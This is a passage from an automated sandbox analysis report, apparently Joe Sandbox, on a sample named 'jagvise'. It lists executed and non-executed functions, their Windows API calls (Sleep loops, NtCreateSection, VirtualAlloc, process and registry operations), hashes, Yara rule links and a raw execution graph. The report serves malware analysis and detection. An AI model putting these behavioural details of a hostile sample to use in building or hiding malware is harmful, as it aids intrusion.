                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                  • Opcode ID: 6d238e4d275f321ba84a9d54ea67be493b39248c77fbf03331765bdaefa4b618
                                                                                                                                                                                  • Instruction ID: e3a8a89f9793f3a67f7cebaa72587345058e1a1b15750940b4a818443ddf913f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d238e4d275f321ba84a9d54ea67be493b39248c77fbf03331765bdaefa4b618
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FF04804A38244CAE704DB74E9507A12363EFAC700F50A02A9319C77B1EBFE4915C71E
                                                                                                                                                                                  Function 00401A06 Relevance: 1.3, APIs: 1, Instructions: 60sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: cdcc311ceb2837f341ba908734da7b35adc779df5b271c6ec761724efb85a897
                                                                                                                                                                                  • Instruction ID: 9ebb0d5d2bcaaf4b8a6da6c44f2a62eb33f0d579d641f982b8f1711b028e46c7
                                                                                                                                                                                  • Opcode Fuzzy Hash: cdcc311ceb2837f341ba908734da7b35adc779df5b271c6ec761724efb85a897
                                                                                                                                                                                  • Instruction Fuzzy Hash: F501AD3170A204EBDB009A948D41EBB3218AB81354F3046B7B603791F1C67DA9136F6F
                                                                                                                                                                                  Function 00401A1C Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: 2f5f28e4999fdf4ae743695e3ae32fff629aee18e9753fdb2de2d595f75c34b4
                                                                                                                                                                                  • Instruction ID: 74bf1b2afaaea11ca0c0e56f9b1f986bf381a10b9881ca68c1150b9356aeb230
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f5f28e4999fdf4ae743695e3ae32fff629aee18e9753fdb2de2d595f75c34b4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 96015E3170A104EBDB009A948D41FBA3214AB85354F3046B7B613791F1C67D9A137F6F
                                                                                                                                                                                  Function 00401A12 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: ae05512fd5251021edca4d15e7d70a9b37d4d87fc1c0fe8ad5807b387d740cb1
                                                                                                                                                                                  • Instruction ID: d73ce5762afe86b3dc9ddffb89cb22f26ca3725698e0de0b5cdea12295139e68
                                                                                                                                                                                  • Opcode Fuzzy Hash: ae05512fd5251021edca4d15e7d70a9b37d4d87fc1c0fe8ad5807b387d740cb1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C019E3170A204EBDB009A808D41FBA3224AB41350F3046B7B6077A1F1C63D9A136F5F
                                                                                                                                                                                  Function 00401A1F Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: 254eab8126462ec38dfc4a3a996a2ad5e8abce04bf8f94b9094cf8f2fa2f2c34
                                                                                                                                                                                  • Instruction ID: ab73073346a6364aa5533d6c8f5fbe814d7e64b70b61ce0f81f834eeff2a0555
                                                                                                                                                                                  • Opcode Fuzzy Hash: 254eab8126462ec38dfc4a3a996a2ad5e8abce04bf8f94b9094cf8f2fa2f2c34
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C017C31B0A205EBDB009AD08D81FBA3214AB45314F3086B7B613BA1F1C63D9A136F5F
                                                                                                                                                                                  Function 00401A22 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                  • Opcode ID: 6e961ae9266916f39a153e19b05d1beb86b796fb0aaf4f479fd1f87af5fb4436
                                                                                                                                                                                  • Instruction ID: 6485c0b3739817a7eba8982835a091150a70886c886236a9745aa1cef3f3b90f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e961ae9266916f39a153e19b05d1beb86b796fb0aaf4f479fd1f87af5fb4436
                                                                                                                                                                                  • Instruction Fuzzy Hash: AC017C31B0A204EBDB009AD08D41FBA3215AB45314F2086B7B617791F1C63E9A136F5F
                                                                                                                                                                                  Function 00401A2F Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: fc7b232f7660c46c0be874543eb3d0c42f9b16e39d899871c612d7a074ae0c1c
                                                                                                                                                                                  • Instruction ID: 2bb26d72c1b977118a941110934db68769275302d48630a1afbcee3c678045b0
                                                                                                                                                                                  • Opcode Fuzzy Hash: fc7b232f7660c46c0be874543eb3d0c42f9b16e39d899871c612d7a074ae0c1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: CE018F31B0A205EBDB009AD08D81FBA3214AB45315F3086B7BA13791F1C67D9A136F5F
                                                                                                                                                                                  Function 00A2AFE3 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A2B034
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983884104.0000000000A28000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A28000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_a28000_jagvise.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                  • Instruction ID: 68311b3f248abeca18ef0a08084828985721c19b6b26ffe1f44f22c8d2653ed2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89112B79A00208EFDB01DF98CA85E99BBF5AF08351F0580A4F9489B362D371EA50DF90
                                                                                                                                                                                  Function 00401A33 Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: eff07d97131d67143dfcdb5282c54e7f4d9014b4e7bbc5dad2acaf1ab08b79e4
                                                                                                                                                                                  • Instruction ID: 7b59a2ed808b167059f1a43439f678e344e3511e3e2d5798feb9efe5e8b923c8
                                                                                                                                                                                  • Opcode Fuzzy Hash: eff07d97131d67143dfcdb5282c54e7f4d9014b4e7bbc5dad2acaf1ab08b79e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F06D35709145EBDB009AD08D41ABB3215AB44325F208677B612791E1C63D9A136F1F
                                                                                                                                                                                  Function 00401A44 Relevance: 1.3, APIs: 1, Instructions: 41sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: bea45b5663554546ed255f19ceb106eb68d8b8c2b8f2cd8be84afbde5940505c
                                                                                                                                                                                  • Instruction ID: 3ce8add922c935329b7be752716cb8cb7767505201ce0f0d8ed020f92cce30f5
                                                                                                                                                                                  • Opcode Fuzzy Hash: bea45b5663554546ed255f19ceb106eb68d8b8c2b8f2cd8be84afbde5940505c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DF06235715245EBDB009ED08D40EBA3714AB44324F604AB7B613B51F2CA3D89526F1F

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 0041F240 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983541097.0000000000411000.00000020.00000001.01000000.00000005.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_411000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                  • Instruction ID: 64dd88673b47847991f90c90a0c150270ab8339d20551cf636ce290819be0711
                                                                                                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                  • Instruction Fuzzy Hash: A611B33A40004AFBCF125E85DC01CEE3F66BF08358B488466FE1859131D33BCAB6AB85
                                                                                                                                                                                  Function 0041E330 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0041E230: GetStartupInfoW.KERNEL32(00000000,0041E35C,00000000,00000000), ref: 0041E243
                                                                                                                                                                                    • Part of subcall function 0041E230: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E25D
                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(00000000,00000000), ref: 0041E365
                                                                                                                                                                                  • FindFirstVolumeA.KERNEL32(00000000,00000000), ref: 0041E36F
                                                                                                                                                                                  • GetShortPathNameA.KERNEL32(00423344,?,00000000), ref: 0041E381
                                                                                                                                                                                  • DeleteVolumeMountPointA.KERNEL32(00000000), ref: 0041E3A0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983541097.0000000000411000.00000020.00000001.01000000.00000005.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_411000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Volume$CreateDeleteEnvironmentFindFirstInfoMountNamePathPointProcessShortStartupStrings
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2571298759-0
                                                                                                                                                                                  • Opcode ID: d9c416af72776200e6d517168cf2674ea94008f16800a90a986a3c4a68269dff
                                                                                                                                                                                  • Instruction ID: bb685419fe8eba5bdcd832a3ff008c7820df2ac98c01d3ef698063781b7e9bdc
                                                                                                                                                                                  • Opcode Fuzzy Hash: d9c416af72776200e6d517168cf2674ea94008f16800a90a986a3c4a68269dff
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF0A4B6740200AFD730EB55FD56FA633A4AB4870AF804026FB05D62A1CBBC1442CB5F
                                                                                                                                                                                  Function 0041E280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E2E1
                                                                                                                                                                                  • GetComputerNameW.KERNEL32(?,?), ref: 0041E2F1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983541097.0000000000411000.00000020.00000001.01000000.00000005.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_411000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ComputerHighestNameNodeNumaNumber
                                                                                                                                                                                  • String ID: <H B
                                                                                                                                                                                  • API String ID: 3700106692-3899015267
                                                                                                                                                                                  • Opcode ID: a9dbd077a819636b3b2f02577daf5532aaf67ee1efca1f1dbf60c07f4e8ba4b1
                                                                                                                                                                                  • Instruction ID: 9bfd3ec4351e3cf3d2b24bd45107cae70517d5d445fe937a0b17fa36dc97bda4
                                                                                                                                                                                  • Opcode Fuzzy Hash: a9dbd077a819636b3b2f02577daf5532aaf67ee1efca1f1dbf60c07f4e8ba4b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C118EB51083459FC3209F26EC416ABB7E4FF84324F40C91DE4A44B241DB38948ACF97

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:17.3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:16.7%
                                                                                                                                                                                  Total number of Nodes:1482
                                                                                                                                                                                  Total number of Limit Nodes:24
                                                                                                                                                                                  execution_graph 4170 402fc0 4171 401446 18 API calls 4170->4171 4172 402fc7 4171->4172 4173 401a13 4172->4173 4174 403017 4172->4174 4175 40300a 4172->4175 4177 406831 18 API calls 4174->4177 4176 401446 18 API calls 4175->4176 4176->4173 4177->4173 4178 4023c1 4179 40145c 18 API calls 4178->4179 4180 4023c8 4179->4180 4183 407296 4180->4183 4186 406efe CreateFileW 4183->4186 4187 406f30 4186->4187 4188 406f4a ReadFile 4186->4188 4189 4062cf 11 API calls 4187->4189 4190 4023d6 4188->4190 4193 406fb0 4188->4193 4189->4190 4191 406fc7 ReadFile lstrcpynA lstrcmpA 4191->4193 4194 40700e SetFilePointer ReadFile 4191->4194 4192 40720f CloseHandle 4192->4190 4193->4190 4193->4191 4193->4192 4195 407009 4193->4195 4194->4192 4196 4070d4 ReadFile 4194->4196 4195->4192 4197 407164 4196->4197 4197->4195 4197->4196 4198 40718b SetFilePointer GlobalAlloc ReadFile 4197->4198 4199 4071eb lstrcpynW GlobalFree 4198->4199 4200 4071cf 4198->4200 4199->4192 4200->4199 4200->4200 4201 401cc3 4202 40145c 18 API calls 4201->4202 4203 401cca lstrlenW 4202->4203 4204 4030dc 4203->4204 4205 4030e3 4204->4205 4207 405f7d wsprintfW 4204->4207 4207->4205 4208 401c46 4209 40145c 18 API calls 4208->4209 4210 401c4c 4209->4210 4211 4062cf 11 API calls 4210->4211 4212 401c59 4211->4212 4213 406cc7 81 API calls 4212->4213 4214 401c64 4213->4214 4215 403049 4216 401446 18 API calls 4215->4216 4217 403050 4216->4217 4218 406831 18 API calls 4217->4218 4219 401a13 4217->4219 4218->4219 4220 40204a 4221 401446 18 API calls 4220->4221 4222 402051 IsWindow 4221->4222 4223 4018d3 4222->4223 4224 40324c 4225 403277 4224->4225 4226 40325e SetTimer 4224->4226 4227 4032cc 4225->4227 4228 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4225->4228 4226->4225 4228->4227 4229 4022cc 4230 40145c 18 API calls 4229->4230 4231 4022d3 4230->4231 4232 406301 2 API calls 4231->4232 4233 4022d9 4232->4233 4235 4022e8 4233->4235 4238 405f7d wsprintfW 4233->4238 4236 4030e3 4235->4236 4239 405f7d wsprintfW 4235->4239 4238->4235 4239->4236 4240 4030cf 4241 40145c 18 API calls 4240->4241 4242 4030d6 4241->4242 4244 4030dc 4242->4244 4247 4063d8 GlobalAlloc lstrlenW 4242->4247 4245 4030e3 4244->4245 4274 405f7d wsprintfW 4244->4274 4248 406460 4247->4248 4249 40640e 4247->4249 4248->4244 4250 40643b GetVersionExW 4249->4250 4275 406057 CharUpperW 4249->4275 4250->4248 4251 40646a 4250->4251 4252 406490 LoadLibraryA 4251->4252 4253 406479 4251->4253 4252->4248 4256 4064ae GetProcAddress GetProcAddress GetProcAddress 4252->4256 4253->4248 4255 4065b1 GlobalFree 4253->4255 4257 4065c7 LoadLibraryA 4255->4257 4258 406709 FreeLibrary 4255->4258 4259 406621 4256->4259 4263 4064d6 4256->4263 4257->4248 4261 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4248 4260 40667d FreeLibrary 4259->4260 4262 406656 4259->4262 4260->4262 4261->4259 4266 406716 4262->4266 4271 4066b1 lstrcmpW 4262->4271 4272 4066e2 CloseHandle 4262->4272 4273 406700 CloseHandle 4262->4273 4263->4259 4264 406516 4263->4264 4265 4064fa FreeLibrary GlobalFree 4263->4265 4264->4255 4267 406528 lstrcpyW OpenProcess 4264->4267 4269 40657b CloseHandle CharUpperW lstrcmpW 4264->4269 4265->4248 4268 40671b CloseHandle FreeLibrary 4266->4268 4267->4264 4267->4269 4270 406730 CloseHandle 4268->4270 4269->4259 4269->4264 4270->4268 4271->4262 4271->4270 4272->4262 4273->4258 4274->4245 4275->4249 4276 4044d1 4277 40450b 4276->4277 4278 40453e 4276->4278 4344 405cb0 GetDlgItemTextW 4277->4344 4279 40454b GetDlgItem GetAsyncKeyState 4278->4279 4283 4045dd 4278->4283 4281 40456a GetDlgItem 4279->4281 4294 404588 4279->4294 4286 403d6b 19 API calls 4281->4286 4282 4046c9 4342 40485f 4282->4342 4346 405cb0 GetDlgItemTextW 4282->4346 4283->4282 4291 406831 18 API calls 4283->4291 4283->4342 4284 404516 4285 406064 5 API calls 4284->4285 4287 40451c 4285->4287 4289 40457d ShowWindow 4286->4289 4290 403ea0 5 API calls 4287->4290 4289->4294 4295 404521 GetDlgItem 4290->4295 4296 40465b SHBrowseForFolderW 4291->4296 4292 4046f5 4297 4067aa 18 API calls 4292->4297 4293 403df6 8 API calls 4298 404873 4293->4298 4299 4045a5 SetWindowTextW 4294->4299 4303 405d85 4 API calls 4294->4303 4300 40452f IsDlgButtonChecked 4295->4300 4295->4342 4296->4282 4302 404673 CoTaskMemFree 4296->4302 4307 4046fb 4297->4307 4301 403d6b 19 API calls 4299->4301 4300->4278 4305 4045c3 4301->4305 4306 40674e 3 API calls 4302->4306 4304 40459b 4303->4304 4304->4299 4311 40674e 3 API calls 4304->4311 4308 403d6b 19 API calls 4305->4308 4309 404680 4306->4309 4347 406035 lstrcpynW 4307->4347 4312 4045ce 4308->4312 4313 4046b7 SetDlgItemTextW 4309->4313 4318 406831 18 API calls 4309->4318 4311->4299 4345 403dc4 SendMessageW 4312->4345 4313->4282 4314 404712 4316 406328 3 API calls 4314->4316 4325 40471a 4316->4325 4317 4045d6 4319 406328 3 API calls 4317->4319 4320 40469f lstrcmpiW 4318->4320 4319->4283 4320->4313 4323 4046b0 lstrcatW 4320->4323 4321 40475c 4348 406035 lstrcpynW 4321->4348 4323->4313 4324 404765 4326 405d85 4 API calls 4324->4326 4325->4321 4329 40677d 2 API calls 4325->4329 4331 4047b1 4325->4331 4327 40476b GetDiskFreeSpaceW 4326->4327 4330 40478f MulDiv 4327->4330 4327->4331 4329->4325 4330->4331 4332 40480e 4331->4332 4349 4043d9 4331->4349 4333 404831 4332->4333 4335 40141d 80 API calls 4332->4335 4357 403db1 KiUserCallbackDispatcher 4333->4357 4335->4333 4336 4047ff 4338 404810 SetDlgItemTextW 4336->4338 4339 404804 4336->4339 4338->4332 4341 4043d9 21 API calls 4339->4341 4340 40484d 4340->4342 4358 403d8d 4340->4358 4341->4332 4342->4293 4344->4284 4345->4317 4346->4292 4347->4314 4348->4324 4350 4043f9 4349->4350 4351 406831 18 API calls 4350->4351 4352 404439 4351->4352 4353 406831 18 API calls 4352->4353 4354 404444 4353->4354 4355 406831 18 API calls 4354->4355 4356 404454 lstrlenW wsprintfW SetDlgItemTextW 4355->4356 4356->4336 4357->4340 4359 403da0 SendMessageW 4358->4359 4360 403d9b 4358->4360 4359->4342 4360->4359 4361 401dd3 4362 401446 18 API calls 4361->4362 4363 401dda 4362->4363 4364 401446 18 API calls 4363->4364 4365 4018d3 4364->4365 4366 402e55 4367 40145c 18 API calls 4366->4367 4368 402e63 4367->4368 4369 402e79 4368->4369 4370 40145c 18 API calls 4368->4370 4371 405e5c 2 API calls 4369->4371 4370->4369 4372 402e7f 4371->4372 4396 405e7c GetFileAttributesW CreateFileW 4372->4396 4374 402e8c 4375 402f35 4374->4375 4376 402e98 GlobalAlloc 4374->4376 4379 4062cf 11 API calls 4375->4379 4377 402eb1 4376->4377 4378 402f2c CloseHandle 4376->4378 4397 403368 SetFilePointer 4377->4397 4378->4375 4381 402f45 4379->4381 4383 402f50 DeleteFileW 4381->4383 4384 402f63 4381->4384 4382 402eb7 4385 403336 ReadFile 4382->4385 4383->4384 4398 401435 4384->4398 4387 402ec0 GlobalAlloc 4385->4387 4388 402ed0 4387->4388 4389 402f04 WriteFile GlobalFree 4387->4389 4391 40337f 33 API calls 4388->4391 4390 40337f 33 API calls 4389->4390 4392 402f29 4390->4392 4395 402edd 4391->4395 4392->4378 4394 402efb GlobalFree 4394->4389 4395->4394 4396->4374 4397->4382 4399 404f9e 25 API calls 4398->4399 4400 401443 4399->4400 4401 401cd5 4402 401446 18 API calls 4401->4402 4403 401cdd 4402->4403 4404 401446 18 API calls 4403->4404 4405 401ce8 4404->4405 4406 40145c 18 API calls 4405->4406 4407 401cf1 4406->4407 4408 401d07 lstrlenW 4407->4408 4409 401d43 4407->4409 4410 401d11 4408->4410 4410->4409 4414 406035 lstrcpynW 4410->4414 4412 401d2c 4412->4409 4413 401d39 lstrlenW 4412->4413 4413->4409 4414->4412 4415 402cd7 4416 401446 18 API calls 4415->4416 4418 402c64 4416->4418 4417 402d17 ReadFile 4417->4418 4418->4415 4418->4417 4419 402d99 4418->4419 4420 402dd8 4421 4030e3 4420->4421 4422 402ddf 4420->4422 4423 402de5 FindClose 4422->4423 4423->4421 4424 401d5c 4425 40145c 18 API calls 4424->4425 4426 401d63 4425->4426 4427 40145c 18 API calls 4426->4427 4428 401d6c 4427->4428 4429 401d73 lstrcmpiW 4428->4429 4430 401d86 lstrcmpW 4428->4430 4431 401d79 4429->4431 4430->4431 4432 401c99 4430->4432 4431->4430 4431->4432 4433 4027e3 4434 4027e9 4433->4434 4435 4027f2 4434->4435 4436 402836 4434->4436 4449 401553 4435->4449 4437 40145c 18 API calls 4436->4437 4439 40283d 4437->4439 4441 4062cf 11 API calls 4439->4441 4440 4027f9 4442 40145c 18 API calls 4440->4442 4446 401a13 4440->4446 4443 40284d 4441->4443 4444 40280a RegDeleteValueW 4442->4444 4453 40149d RegOpenKeyExW 4443->4453 4445 4062cf 11 API calls 4444->4445 4448 40282a RegCloseKey 4445->4448 4448->4446 4450 401563 4449->4450 4451 40145c 18 API calls 4450->4451 4452 401589 RegOpenKeyExW 4451->4452 4452->4440 4456 4014c9 4453->4456 4461 401515 4453->4461 4454 4014ef RegEnumKeyW 4455 401501 RegCloseKey 4454->4455 4454->4456 4458 406328 3 API calls 4455->4458 4456->4454 4456->4455 4457 401526 RegCloseKey 4456->4457 4459 40149d 3 API calls 4456->4459 4457->4461 4460 401511 4458->4460 